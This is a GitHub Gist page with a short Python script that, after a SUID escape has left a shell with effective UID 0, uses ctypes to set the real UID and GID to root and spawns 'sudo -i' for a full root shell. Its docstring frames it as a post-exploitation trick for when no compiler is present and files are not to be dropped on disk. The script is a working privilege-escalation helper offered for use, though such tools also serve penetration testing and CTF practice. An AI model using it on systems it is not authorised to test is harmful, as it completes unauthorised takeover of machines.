Last active
September 17, 2021 11:47
-
-
Save nnsee/d02a7fb6bc64396b4435d54e685bc4b6 to your computer and use it in GitHub Desktop.
Set UID/GID to EUID and spawn a shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Let's say you've been able to run a SUID binary and | |
| dropped into a shell where your EUID is 0, but your | |
| real UID/GID are still 1000. There's no C compiler | |
| and you're not really keen on dropping files on disk. | |
| bash drops EUID for security purposes and sudo still | |
| asks for a password. But there's Python installed. | |
| """ | |
| from ctypes import CDLL | |
| from pty import spawn | |
| l = CDLL(None) | |
| euid = l.geteuid() | |
| l.setuid(euid) | |
| l.setgid(euid) | |
| spawn(['sudo', '-i']) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment